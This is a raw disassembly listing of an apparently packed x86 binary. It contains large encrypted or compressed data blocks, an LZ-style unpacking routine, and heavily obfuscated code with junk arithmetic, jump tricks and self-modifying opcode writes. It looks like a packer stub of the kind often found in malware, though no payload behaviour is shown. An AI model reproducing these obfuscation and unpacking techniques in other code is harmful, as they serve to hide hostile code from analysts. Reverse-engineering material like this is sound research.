dd 2181A765h, 0EA5570B1h, 0B9997065h, 0EFE215CBh, 0C51CECB5h
dd 0DF89CE4h, 3BDD6462h, 99C54136h, 6DECF0Eh, 27D15D3Dh
dd 7C5DF87Fh, 0B4D3E7E2h, 0B4B63D53h, 956C5FC9h, 7CFBB4F3h
dd 646FB406h, 1F8C2BF4h, 13FDFC8Eh, 17D728B3h, 4A6E35CBh
dd 0C85BBDCh, 7B7D5F39h, 68B55F42h, 6FD14750h, 629F69FCh
dd 0FE450B0Fh, 5F52B39Ch, 2FCAB558h, 76D46506h, 0C8F81E6Ch
dd 611637C3h, 3BB14951h, 54E5FC50h, 0B44EB215h, 0FB3820FCh
dd 25FC35F1h, 0BD141AA0h, 887A3C18h, 6F1685C3h, 3DD9C9Ch
dd 77AEC5FEh, 0D6691543h, 0BF03FA99h, 0E3713854h, 90ACEC6Bh
dd 69856BD6h, 8F5DD868h, 0F7DAB376h, 59F815F6h, 7D6FC214h
dd 0C6D1D326h, 7FA892Ah, 0BE9A3DF7h, 0FA0CED7Bh, 0BFB88h
dd 62A675D3h, 3EA4F159h, 0AE6EF689h, 6BF99DA5h, 0C4CCDEC0h
dd 0F11F5B78h, 195D66FBh, 2C9E6633h, 0C5A346E6h, 0C0BDE330h
dd 0B8E0E79Bh, 98F2CDFCh, 0B160D842h, 0FD2AB9BBh, 6A6CA5DDh
dd 9596D0D1h, 94B935CAh, 0F32B77BEh, 0B2358913h, 0B6F98247h
dd 0F86D9D71h, 0AFF9BED7h, 0A0B18F7Ch, 9AEB0B90h, 0F5717365h
dd 0A36F6A9Bh, 0A9F62497h, 2BBC9757h, 0CF8B2383h, 0BC4F177Eh
dd 1C37621Fh, 0E0EAAADFh, 0CDB3D8AAh, 64908B45h, 0BD77B59Bh
dd 0C547FBF5h, 6B47AF15h, 3D9F84B7h, 22D8097Dh, 58E40FA2h
dd 0BAD0AA7Dh, 0FF3689A5h, 6C17FE91h, 951D08BFh, 0DDDF0750h
dd 0E7C2B33h, 27F0A502h, 78AA4170h, 0F894B0A5h, 0A9F8CAFFh
dd 123E5C3Fh, 5647C5Dh, 62F9C3CAh, 0AB07D68Ah, 0B1511BFDh
dd 7D15FA95h, 4EBC097Fh, 0F573555h, 0F70D5374h, 0FC4652F5h
dd 0B27E12F5h, 0D5CB57BFh
dd 0AD2659D5h, 26D1E8A8h, 7F8B47D5h, 0D917FC2h, 7407DFA5h
dd 9DFDBA1Ch, 7F635EE6h, 0DC5322ABh, 83CD9FCBh, 2C1C5A24h
dd 927EF4A3h, 0A37390BFh, 0B51A42DFh, 1A18B45Eh, 0B710A1ADh
dd 0E76C04C7h, 0D547029Eh, 8C095D6Fh, 565E622Dh, 1C7B4F53h
dd 3381E066h, 0A6796BF8h, 494556CCh, 0BCFA95F1h, 0B2CB3E4Ah
dd 0B7DCCEE3h, 1DE7B04Dh, 5D6B0B6Fh, 0C6769E45h, 0F7AA33FBh
dd 9B47DFFh, 96CA7814h, 0EC7B8EA1h, 0DA8073E6h, 0CDAAA44Bh
dd 8083FAEAh, 3A9188BFh, 0F63A07AFh, 9BBA97FAh, 4B8AA2FDh
dd 772FAD75h, 4AF90BA1h, 15F7E9BBh, 28A54D5Dh, 1DD389ECh
dd 57D9414Bh, 46EDF45Ah, 6F26C025h, 3ED2483Eh, 2036055Fh
dd 0B3255324h, 0C0F7B23Ah, 4CDBF9A5h, 6E7FB689h, 5F1B61C5h
dd 77A98D8Fh, 4BC5632Fh, 0E885E668h, 10F2FE0Eh, 0B7CDBE00h
dd 48877463h, 0FB608DD1h, 6BB87899h, 58A2FEEFh, 8FA00DBCh
dd 817F2AEBh, 0EC405A65h, 77E94F05h, 4746E64Ah, 1556EC51h
dd 6E4B5B68h, 0CEB942DDh, 180BFF69h, 27A2A81Ah, 9B6BF027h
dd 0F66BEA0Eh, 9E3FD237h, 8A78A092h, 36FDC35Fh, 5837B6CAh
dd 0D1843CDAh, 0BAD652DEh, 970263C1h, 5130074Fh, 41FC71CAh
dd 0D07B0404h, 2FA2F1DDh, 2091F4DCh, 56B12DE1h, 5A3334D1h
dd 63FCF657h, 56CBB013h, 0DAA3920Dh, 0E9C6ABE5h, 0AA7D16h
dd 0B703FFCh, 38ABF983h, 968A24F0h, 11F6FE51h, 0F657F97Fh
dd 33DCC048h, 5752C732h, 475A79BDh, 0B1CE1D4Ch, 0F63A8BE1h
dd 5316E379h, 0F5C65DCBh, 0FB59E4C0h, 0F2BFBEAEh, 176B0FF0h
dd 5080A6C7h, 0CDE1157Bh, 550AAFF7h, 55B838D5h, 0E9F29800h
dd 0D7D34CBAh, 8557EEA3h, 34912A52h, 5ADCA4CDh, 55EC1A80h
dd 0AFA47F2Bh, 0B475FF56h, 9E3855ADh, 795E0F1Ah, 8F2B4BFh
dd 0D9B07778h, 0E4AAAE0Fh, 2016E92Ch, 0B03A1481h, 0D8F53E33h
dd 0E31C6B44h, 35D105BAh, 51650788h, 0E99CE63h, 0C5D4E070h
dd 95AC2EFCh, 0E95E2247h, 56926F77h, 0CEA58BEAh, 0AFBD4955h
dd 0DE86B48Eh, 2736315Ah, 4CB4556Ch, 4C807395h, 0C72BF10Fh
dd 0C1CA3EAAh, 0FC608AF9h, 0B69AAF08h, 192B9D59h, 0B2EE43F0h
dd 5B97D88Ch, 2F8FE17Eh, 555289AEh, 781EB57Ah, 7B2F729h
dd 0E248325Fh, 2B135890h, 0D524C8B1h, 0DF81D824h, 1A24F9BEh
dd 0DCFE34CFh, 9CA141AEh, 7EDD6317h, 370FAFCDh, 6786EA4Bh
dd 0B76F9EBFh, 0F6AA72FAh, 383E0841h, 0FBA635FBh, 4792A947h
dd 0FD562470h, 5F8AAD8Eh, 918F7CF0h, 0C220389Bh, 0AE6730BEh
dd 0E7A1A90Fh, 0D5FBBD3h, 0AC18DF0Dh, 0B80AFC65h, 496837B8h
dd 1FF64FB3h, 0B1EB816Eh, 0EAF78B38h, 0A1350BF8h, 3C2F6F95h
dd 4D7B8D5Eh, 0AC542D16h, 79EAC159h, 0F487E028h, 0CE9AA7DFh
dd 857DDE5Bh, 9C53BE95h, 0A7DB594Bh, 6F6114FBh, 40709540h
dd 33A0383Fh, 52D4D938h, 12BD37D2h, 0D1F9BA88h, 7FF2E0FBh
dd 2B3616E6h, 7B621E16h, 0C57E0D6Fh, 0B4A2D1DDh, 0BF83FEC6h
dd 0D3C1E5BAh, 0C5D6CA5Ch, 0BBDEF375h, 873D1249h, 6467D5CBh
dd 50D6C075h, 3E0AEC87h, 985CBF79h, 1BDF4BE1h, 8555B1C4h
dd 6A50730Bh, 0CE021D27h, 4577204Eh, 15EB3BBAh, 5EECBC19h
dd 9B5DBADEh, 0A6A982FFh, 85DEE3A9h, 51489366h, 1A3BAA36h
dd 0BAA41F5Dh, 0EC70425Dh, 0EB7A1DC6h, 8F2B31AFh, 16C57ACFh
dd 0FB290000h, 6132h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E5F8 proc near ; DATA XREF: sub_432AFD+3A�o
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042E777 SIZE 00000004 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
cld
push ebx
push edi
push esi
mov [ebp+var_4], eax
mov [ebp+var_8], edx
mov esi, eax
mov edi, edx
cmp word ptr [esi], 434Ah
jnz loc_42E73A
add esi, 0Ah
mov [ebp+var_C], 8
xor ebx, ebx
mov edx, 80000000h
inc ebx
loc_42E629: ; CODE XREF: sub_42E5F8+46�j
; sub_42E5F8+8D�j ...
xor eax, eax
call sub_42E741
jnb short loc_42E640
mov ecx, [ebp+var_10]
call sub_42E759
add al, [ebp+var_11]
loc_42E63D: ; CODE XREF: sub_42E5F8+65�j
stosb
jmp short loc_42E629
; ---------------------------------------------------------------------------
loc_42E640: ; CODE XREF: sub_42E5F8+38�j
call sub_42E741
jb loc_42E6E2
call sub_42E741
jnb short loc_42E6AD
mov ecx, 4
call sub_42E759
dec eax
jz short loc_42E63D
jns loc_42E72C
call sub_42E741
jnb short loc_42E687
push ebp
loc_42E66D: ; CODE XREF: sub_42E5F8+8A�j
mov ebp, 100h
loc_42E672: ; CODE XREF: sub_42E5F8+83�j
call sub_42E74E
mov [edi], al
inc edi
dec ebp
jnz short loc_42E672
call sub_42E741
jb short loc_42E66D
pop ebp
jmp short loc_42E629
; ---------------------------------------------------------------------------
loc_42E687: ; CODE XREF: sub_42E5F8+72�j
mov ecx, 1
call sub_42E759
add eax, 7
mov [ebp+var_10], eax
mov [ebp+var_11], 0
cmp eax, 8
jz short loc_42E629
call sub_42E74E
mov [ebp+var_11], al
jmp loc_42E629
; ---------------------------------------------------------------------------
loc_42E6AD: ; CODE XREF: sub_42E5F8+58�j
mov ecx, 7
call sub_42E759
push eax
mov ecx, 2
call sub_42E759
mov ecx, eax
inc ecx
inc ecx
pop eax
or eax, eax
jz short loc_42E6CF
mov ebx, eax
jmp short loc_42E72D
; ---------------------------------------------------------------------------
loc_42E6CF: ; CODE XREF: sub_42E5F8+D1�j
cmp ecx, 2
jz short loc_42E73A
inc ecx
call sub_42E759
mov [ebp+var_C], eax
jmp loc_42E629
; ---------------------------------------------------------------------------
loc_42E6E2: ; CODE XREF: sub_42E5F8+4D�j
call sub_42E765
dec ecx
loop loc_42E6F3
mov eax, ebx
call sub_42E765
jmp short loc_42E72D
; ---------------------------------------------------------------------------
loc_42E6F3: ; CODE XREF: sub_42E5F8+F0�j
dec ecx
mov eax, ecx
push ebp
mov ecx, [ebp+var_C]
mov ebp, eax
xor eax, eax
shl ebp, cl
call sub_42E759
or eax, ebp
pop ebp
mov ebx, eax
call sub_42E765
cmp eax, 10000h
jnb short loc_42E72A
cmp eax, 37FFh
jnb short loc_42E72B
cmp eax, 27Fh
jnb short loc_42E72C
cmp eax, 7Fh
ja short loc_42E72D
inc ecx
loc_42E72A: ; CODE XREF: sub_42E5F8+11C�j
inc ecx
loc_42E72B: ; CODE XREF: sub_42E5F8+123�j
inc ecx
loc_42E72C: ; CODE XREF: sub_42E5F8+67�j
; sub_42E5F8+12A�j
inc ecx
loc_42E72D: ; CODE XREF: sub_42E5F8+D5�j
; sub_42E5F8+F9�j ...
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp loc_42E629
; ---------------------------------------------------------------------------
loc_42E73A: ; CODE XREF: sub_42E5F8+19�j
; sub_42E5F8+DA�j
mov eax, esi
pop esi
pop edi
pop ebx
jmp short loc_42E777
sub_42E5F8 endp
; =============== S U B R O U T I N E =======================================
sub_42E741 proc near ; CODE XREF: sub_42E5F8+33�p
; sub_42E5F8:loc_42E640�p ...
add edx, edx
jnz short locret_42E74D
mov edx, [esi]
add esi, 4
stc
adc edx, edx
locret_42E74D: ; CODE XREF: sub_42E741+2�j
retn
sub_42E741 endp
; =============== S U B R O U T I N E =======================================
sub_42E74E proc near ; CODE XREF: sub_42E5F8:loc_42E672�p
; sub_42E5F8+A8�p
mov ecx, 8
call sub_42E759
retn
sub_42E74E endp
; =============== S U B R O U T I N E =======================================
sub_42E759 proc near ; CODE XREF: sub_42E5F8+3D�p
; sub_42E5F8+5F�p ...
xor eax, eax
loc_42E75B: ; CODE XREF: sub_42E759+9�j
call sub_42E741
adc eax, eax
loop loc_42E75B
retn
sub_42E759 endp
; =============== S U B R O U T I N E =======================================
sub_42E765 proc near ; CODE XREF: sub_42E5F8:loc_42E6E2�p
; sub_42E5F8+F4�p ...
xor ecx, ecx
inc ecx
loc_42E768: ; CODE XREF: sub_42E765+F�j
call sub_42E741
adc ecx, ecx
call sub_42E741
jb short loc_42E768
retn
sub_42E765 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E5F8
loc_42E777: ; CODE XREF: sub_42E5F8+147�j
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42E5F8
; ---------------------------------------------------------------------------
align 4
loc_42E77C: ; CODE XREF: fzj3qwht:00431278�j
; DATA XREF: sub_432AF7�o ...
xchg ecx, [esp]
pop ecx
or eax, eax
jnz locret_42FA0B
push offset loc_42FA05
jmp locret_42F9F2
; ---------------------------------------------------------------------------
dw 0F00h
dd 2D83h, 0DF2B5600h, 5579F081h, 0DAE97BE9h, 2Eh, 0C300h
; CODE XREF: fzj3qwht:loc_42FB05�j
dd 0A84AA9BAh, 0F4840FE6h, 0E9000030h, 3C2Bh, 7C870F00h
dd 8B000023h, 8C0F005Dh, 2B0Fh, 0D852E881h, 0F881A4B4h
dd 0D7897CECh, 0EBDE9h, 24348700h, 0E8C7815Eh, 89B3ED6Eh
dd 40F0E907h, 0D5810000h, 0F37DDA44h, 2D52E9h, 34870000h
dd 0FAE85E24h, 0C3000024h, 0F4DE9h, 74858B00h, 68FFFFFFh
dd 4323D0h, 170AE9h, 0F000000h, 34F984h, 0FF850F00h, 0E900001Dh
dd 188Dh, 0E900C300h, 16Ch, 34E900h, 0
; ---------------------------------------------------------------------------
loc_42E83C: ; DATA XREF: sub_430917+1CBF�o
call sub_432992
mov ds:byte_43219D, 0E8h
mov ds:byte_43054D, 87h
mov ds:byte_430550, 5Eh
mov ds:byte_430551, 0Fh
mov ds:byte_431DCE, 0Fh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_145. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0), 0E9h ; CODE XREF: sub_4301AC+11EA�j
dd 16D7h, 0E9C300C3h, 2DD0h, 0F6810000h, 0A7D55A35h, 0FFFF79E9h
; DATA XREF: sub_431410:loc_42FE63�o
dd 0C300FFh, 298FE9h, 51000000h, 430ECDB9h, 363CE900h
dd 0
; ---------------------------------------------------------------------------
loc_42E898: ; DATA XREF: fzj3qwht:0042EFF7�o
xchg edi, [esp]
mov eax, edi
pop edi
and eax, 5B675CFFh
rol eax, 18h
jmp loc_4310CB
; ---------------------------------------------------------------------------
dd 0EE80000h, 0C3000000h, 3A65E900h, 64E90000h, 13h, 0DD8B5300h
; CODE XREF: fzj3qwht:0043173D�j
dd 1442E9h, 0F7330000h, 6D4E9h, 8890000h, 1DC8E9h, 237DE800h
dd 0B4E90000h, 0Fh, 0AB3E900h, 0
; ---------------------------------------------------------------------------
loc_42E8EC: ; DATA XREF: fzj3qwht:00432581�o
add eax, ebp
loc_42E8EE: ; CODE XREF: fzj3qwht:00430260�j
push edi
push 7A10CB36h
pop edi
or edi, 0B4026B69h
add edi, 2C64EABFh
jmp loc_430FB4
; ---------------------------------------------------------------------------
align 4
loc_42E908: ; CODE XREF: fzj3qwht:00432272�j
mov byte ptr [edi], 0Fh
pop edi
add ecx, 0DB520Bh
push offset loc_42F7FD
jmp locret_42F7F7
; ---------------------------------------------------------------------------
dd 0FA810000h, 26F63A9Dh, 3900E9h, 0F000000h, 4C984h, 234CE900h
dd 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F11
loc_42E938: ; CODE XREF: sub_431F11+80D�j
pop edi
and esi, 44D2FDBDh
xor esi, 0FBEF6A7Ah
call sub_42EFCF
add al, ch ; CODE XREF: sub_43052F:loc_4308D6�j
xchg eax, esi
push cs
; END OF FUNCTION CHUNK FOR sub_431F11
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
loc_42E950: ; CODE XREF: fzj3qwht:00431C4C�j
jmp loc_431118
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h ; CODE XREF: sub_431410+642�j
dd 0E32h, 4C083C3h, 43117D68h, 784E900h, 0
; ---------------------------------------------------------------------------
xor eax, 0AE6DD5A0h
or eax, 18CF1777h
add eax, 553FC9Fh
jmp loc_43231A
; ---------------------------------------------------------------------------
align 4
dd 0FDB95100h, 0E90042FBh, 1CF2h
; =============== S U B R O U T I N E =======================================
sub_42E990 proc near ; CODE XREF: sub_431410+60E�p
xchg ebx, [esp+0]
pop ebx
call loc_431480
and edx, esi
jmp sub_4316FE
sub_42E990 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 2
dw 0F581h
dd 6F84440Dh, 0FDE5840Fh, 27E9FFFFh, 39h, 0E900C35Eh, 0F0Dh
dd 0CC680000h, 0E9004311h, 3DF2h, 5B241C87h, 878702C6h
dd 0D68B2434h, 81D5035Eh, 3C2D5CC2h, 2454E926h, 0C30000h
dd 1DEAC100h, 0D04FC581h, 16E9262Ch, 0Eh, 8B45C700h, 65746365h
dd 648F4565h, 56005B20h, 34A65E55h, 31A2E924h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301B7
loc_42EA10: ; CODE XREF: sub_4301B7+149A�j
jnz loc_42ED1B
rol ebx, 12h
jmp loc_42ED0A
; END OF FUNCTION CHUNK FOR sub_4301B7
; ---------------------------------------------------------------------------
align 10h
jb loc_42F7E6
js loc_43128E
jmp sub_430315
; ---------------------------------------------------------------------------
db 2 dup(0), 87h
; ---------------------------------------------------------------------------
adc al, 24h
pop edx
mov byte ptr [eax], 87h
call sub_431AED
loc_42EA3F: ; CODE XREF: fzj3qwht:0042F802�j
jmp locret_431508
; ---------------------------------------------------------------------------
dd 0DE8B5300h, 0BE241C87h, 42F150h, 0AECE9h, 0C6810000h
dd 8BD7ED42h, 430CE868h, 38AEE900h, 850F0000h, 2110h, 29DB840Fh
dd 9E90000h, 32h, 815D5800h, 183A66C0h, 56E8812Ah, 813B8F4Dh
dd 0E5340E0h, 0A6850F4Ah, 2Ah, 85CD0300h, 2A3DE9C1h, 5A000000h
dd 0D79687Fh, 815850C9h, 537AABE8h, 3FC0818Ah, 0E923AF97h
dd 356Eh, 2C870000h, 0E0376824h, 815FC5D9h, 0E1E360F7h
dd 80C781A8h, 87930AE7h, 0D0E9243Ch, 68000016h, 0B643DA4h
dd 3A09E9h, 0C0D15800h, 0A199C081h, 6EE96BBBh, 7, 23E18C0Fh
dd 880F0000h, 43Ch, 3A10820Fh, 7E680000h, 56A858B1h, 3487F18Bh
dd 0EF28B924h, 51E90042h, 8B000030h, 0C4EE8F5h, 0E9000000h
dd 11C3h, 3905E9h
db 3 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_161. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp loc_42F912
; ---------------------------------------------------------------------------
align 2
add ebx, 0ABCA0E5Dh
jmp loc_42F29D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4323E7
loc_42EB3D: ; CODE XREF: sub_4323E7:loc_431BC3�j
jnb near ptr dword_42EF00+4
; END OF FUNCTION CHUNK FOR sub_4323E7
; ---------------------------------------------------------------------------
db 0
db 0
db 0E9h ; é
db 0DFh ; ß
db 0Eh
db 0
db 0
db 0F7h ; ÷
db 0C5h ; Å
db 0BFh ; ¿
db 99h ; ™
db 0B1h ; ±
db 0CFh ; Ï
db 0E9h ; é
db 98h ; ˜
db 23h ; #
db 0
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_42EB56 proc near ; CODE XREF: sub_431410:loc_432616�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042FAD6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004324E3 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
push esi
push 1EE5CBDBh
xchg ecx, [esp+4+var_4]
mov esi, ecx
pop ecx
jmp loc_4324E3
sub_42EB56 endp
; ---------------------------------------------------------------------------
jl loc_42F059
add ecx, eax
jmp loc_431989
; ---------------------------------------------------------------------------
dd 0E4680000h, 0E900430Fh, 245Ah, 570AE881h, 0F881FB67h
dd 8D2465C8h, 0BADE9h, 128B0000h, 0A43C2AF6h, 6850Fh, 0BAE90000h
dd 10h, 0E9243C87h, 1D55h, 0E9F73B00h, 2632h, 17C1C100h
dd 9758C181h, 0F103DD14h, 1BEFE859h, 0AEE90000h, 0C600000Ah
dd 0CF688707h, 0E90042ECh, 3179h, 24348700h, 15F2E85Eh
dd 0E2E90000h, 0E9000007h, 2D02h, 4182F081h, 890FF843h
dd 3398h, 0FF82E900h, 0FC68FFFFh, 1B9E49DAh, 0FC5C1DEh
dd 3377E9h, 3C870000h, 5FC78B24h, 93CE881h, 0C0C10807h
dd 78E88106h, 0E971ED4Fh, 1D26h, 7A8D0F00h, 1300000Eh
dd 2021E9DEh, 0E8520000h, 9F2h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431686
loc_42EC41: ; CODE XREF: sub_431686:loc_4310CB�j
add eax, 0F3F0EDE9h
or eax, eax
jz loc_42FB23
push esi
push 96844F2Eh
pop esi
xor esi, 0CEE1DA5Bh
and esi, 902E7186h
jmp loc_42F33B
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
align 4
dd 0B8CE8100h, 8105E07Dh, 4BFE8DC6h, 1953E9F8h, 3000000h
; CODE XREF: fzj3qwht:loc_431D41�j
dd 0E71E8C5h, 0D9810000h, 2D350DD6h, 8F6BF581h, 0F28101C9h
dd 164F6DD3h, 5396CA81h, 0C2819CF0h, 72654390h, 380BE9h
dd 2D680000h, 5A3934CAh, 8112C2C1h, 346938C2h, 0D6CA81E1h
dd 814D70E9h, 31F110FAh, 21B5E98Dh, 19870000h, 1861E9h
dd 0E8000000h, 1241h, 24148700h, 6268535Ah, 5BE74228h
dd 0F60C381h, 0CBE9D7DCh, 1Dh, 4C08CF81h, 0C7810983h, 0AE32EAAEh
dd 0DD5FC703h, 1C68E800h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4316FE
loc_42ED04: ; CODE XREF: sub_4316FE+26D�j
jmp loc_42F975
; END OF FUNCTION CHUNK FOR sub_4316FE
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_4301B7
loc_42ED0A: ; CODE XREF: sub_4301B7-179E�j
jnb loc_430EA7
ror edi, 0Fh
sub edi, ebx
js loc_42FA8F
loc_42ED1B: ; CODE XREF: sub_4301B7:loc_42EA10�j
sub ecx, 33D8C30Dh
jmp loc_42FC14
; END OF FUNCTION CHUNK FOR sub_4301B7
; ---------------------------------------------------------------------------
align 4
loc_42ED28: ; CODE XREF: fzj3qwht:loc_43062B�j
mov byte ptr [edx], 8Bh
pop edx
xor eax, 0ED7BE5CBh
rol eax, 1
call sub_42FFDE
push offset dword_42FBD0
jmp locret_430DBE
; ---------------------------------------------------------------------------
align 4
shl edi, 14h
jmp loc_42EF97
; ---------------------------------------------------------------------------
loc_42ED4C: ; CODE XREF: fzj3qwht:004303FF�j
pop ecx
or ecx, 0D84A7015h
and ecx, 41F09B30h
xor ecx, 0E21DFF6Ah
loc_42ED5F: ; CODE XREF: fzj3qwht:0042EDDC�j
and ecx, 0BAD399F6h
xor ecx, 0CB8ED07Ch
cmp eax, ecx
pop ecx
jmp loc_42FB05
; ---------------------------------------------------------------------------
align 4
dd 240C8700h, 8159C18Bh, 183A66C0h, 2BFCE92Ah
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_42ED87 proc near ; CODE XREF: sub_4301B7-59B�p
; fzj3qwht:004318DC�j
xchg ebx, [esp+0]
pop ebx
push offset word_42FE22
jmp nullsub_133
sub_42ED87 endp
; ---------------------------------------------------------------------------
align 2
loc_42ED96: ; CODE XREF: fzj3qwht:0042FBB7�j
mov byte ptr [ecx], 9Dh
xchg edx, [esp]
mov ecx, edx
pop edx
add esi, 160EEDBCh
jmp loc_431B37
; ---------------------------------------------------------------------------
align 4
pop edx
rol edx, 1Eh
sub edx, 0E53CBE58h
rol edx, 1Bh
add edx, 84264892h
push offset sub_4301AC
jmp loc_430AB0
; ---------------------------------------------------------------------------
db 2 dup(0), 68h
; ---------------------------------------------------------------------------
fdivr dword ptr [esi-7EA0B83Eh]
mov dword ptr [ebx-7E17E1BCh], 9414F5EFh
jnb short loc_42ED5F
mov esi, 3B8D0F1Ah
mov dword ptr [edi-17h], 8FCh
mov esi, [eax]
jmp sub_430E46
; ---------------------------------------------------------------------------
dw 0B00h
dd 0FB96E9EAh, 0B0E9FFFFh, 2Bh, 0E8008B00h, 0FFFFF974h
dd 0F482BE00h, 96E90042h, 2Eh, 0E0815800h, 443009E0h, 0F061E881h
dd 6852DEAFh, 0AAB557F4h, 1659E95Ah, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
mov eax, offset loc_4301BF
jmp loc_42F5B2
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431AED
loc_42EE3D: ; CODE XREF: sub_431AED:loc_4316D0�j
pop esi
rol eax, 1Ch
or eax, 1BB14DB6h
xor eax, 73E5362Dh
or eax, 0FA29AD7Bh
push offset byte_43047B
jmp nullsub_137
; END OF FUNCTION CHUNK FOR sub_431AED
; ---------------------------------------------------------------------------
locret_42EE5D: ; CODE XREF: fzj3qwht:00430D62�j
retn
; ---------------------------------------------------------------------------
loc_42EE5E: ; CODE XREF: fzj3qwht:004307F2�j
jmp loc_430EA7
; ---------------------------------------------------------------------------
db 0E9h
dd 0FFFFFA71h, 0E9D62300h, 1D68h, 85680000h, 0E9004310h
dd 15C4h, 0B645E181h, 12E96A13h, 35h, 0BF58C0Fh, 0DF1B0000h
; =============== S U B R O U T I N E =======================================
sub_42EE90 proc near ; CODE XREF: sub_431452:loc_431517�p
; FUNCTION CHUNK AT 0042FEF6 SIZE 0000000B BYTES
xchg esi, [esp+0]
pop esi
jmp loc_42FEF6
sub_42EE90 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
push offset aHSoxbstxpchC ; "hÝš‘®Xè’•¯—hê(C"
jmp locret_42FF52
; ---------------------------------------------------------------------------
dd 0A0C015FFh, 0E8520042h, 34FAh, 0DCE90000h, 4, 316EE800h
dd 0E9000000h, 20Ah
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43005C
loc_42EEC6: ; CODE XREF: sub_43005C:loc_431CDC�j
rol esi, 1Fh
add esi, 20002205h
add eax, esi
push offset loc_42F2E3
jmp nullsub_101
; END OF FUNCTION CHUNK FOR sub_43005C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_42F4AE
db 68h ; h
db 0CFh ; Ï
db 0EBh ; ë
db 42h ; B
db 0
db 0E9h ; é
db 3Ah ; :
db 33h ; 3
db 0
db 0
; END OF FUNCTION CHUNK FOR sub_42F4AE
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_135. PRESS KEYPAD "+" TO EXPAND]
db 0
; ---------------------------------------------------------------------------
loc_42EEE9: ; DATA XREF: sub_431452+8E3�o
push edi
push 49D322Eh
pop edi
jmp loc_431502
; ---------------------------------------------------------------------------
loc_42EEF5: ; CODE XREF: fzj3qwht:loc_42EF3E�j
push edx
mov edx, offset dword_43263C
jmp loc_431635
; ---------------------------------------------------------------------------
dword_42EF00 dd 0E90B9C00h, 183FC681h, 63E9BD4Dh, 0FFFFFFh
; CODE XREF: sub_4323E7:loc_42EB3D�j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431167
loc_42EF10: ; CODE XREF: sub_431167:loc_430E98�j
mov eax, ecx
xchg eax, [esp+0]
lea eax, byte_431DCE
push eax
mov eax, offset loc_430C96
jmp loc_430025
; END OF FUNCTION CHUNK FOR sub_431167
; ---------------------------------------------------------------------------
align 4
loc_42EF28: ; CODE XREF: fzj3qwht:004324B0�j
add al, 0D5h
add edx, 8FA0DCAEh
mov edx, [edx]
jmp loc_43230D
; ---------------------------------------------------------------------------
align 4
jb loc_432512
loc_42EF3E: ; CODE XREF: fzj3qwht:0042F13C�j
jmp loc_42EEF5
; ---------------------------------------------------------------------------
align 4
mov byte ptr [ecx], 8Bh
pop ecx
push ebp
mov ebp, esp
call sub_431452
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431452
loc_42EF52: ; CODE XREF: sub_431452+155�j
jmp loc_430598
; END OF FUNCTION CHUNK FOR sub_431452
; ---------------------------------------------------------------------------
align 4
dd 0E9EA3B00h, 1300h, 24148700h, 0B68525Ah, 516DBA1Ah
dd 0C87C88Bh, 0A4366824h, 66E9CA43h, 0FFFFFBh, 24348700h
dd 8B243C87h, 96E95FF7h, 0E800000Bh, 3316h, 85FE9h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_42EF97: ; CODE XREF: fzj3qwht:0042ED47�j
xchg edi, [esp]
pop edi
mov byte ptr [ebx], 3
pop ebx
jmp loc_42F38D
; ---------------------------------------------------------------------------
dd 0E9F73B00h, 325Ah, 0C74E89Dh
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FF6B
loc_42EFB2: ; CODE XREF: sub_42FF6B-226�j
jmp loc_432476
; END OF FUNCTION CHUNK FOR sub_42FF6B
; ---------------------------------------------------------------------------
align 4
loc_42EFB8: ; CODE XREF: fzj3qwht:loc_43231A�j
mov byte ptr [eax], 0Fh
pop eax
add eax, 835E3283h
or eax, 6BE77C8Ah
call sub_431410
; ---------------------------------------------------------------------------
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_42EFCF proc near ; CODE XREF: sub_431F11-35CC�p
; FUNCTION CHUNK AT 004304D0 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00430761 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043077E SIZE 0000000A BYTES
xchg ecx, [esp+0]
pop ecx
push edx
mov edx, esi
xchg edx, [esp+0]
jmp loc_430761
sub_42EFCF endp
; ---------------------------------------------------------------------------
mov byte ptr [eax], 0
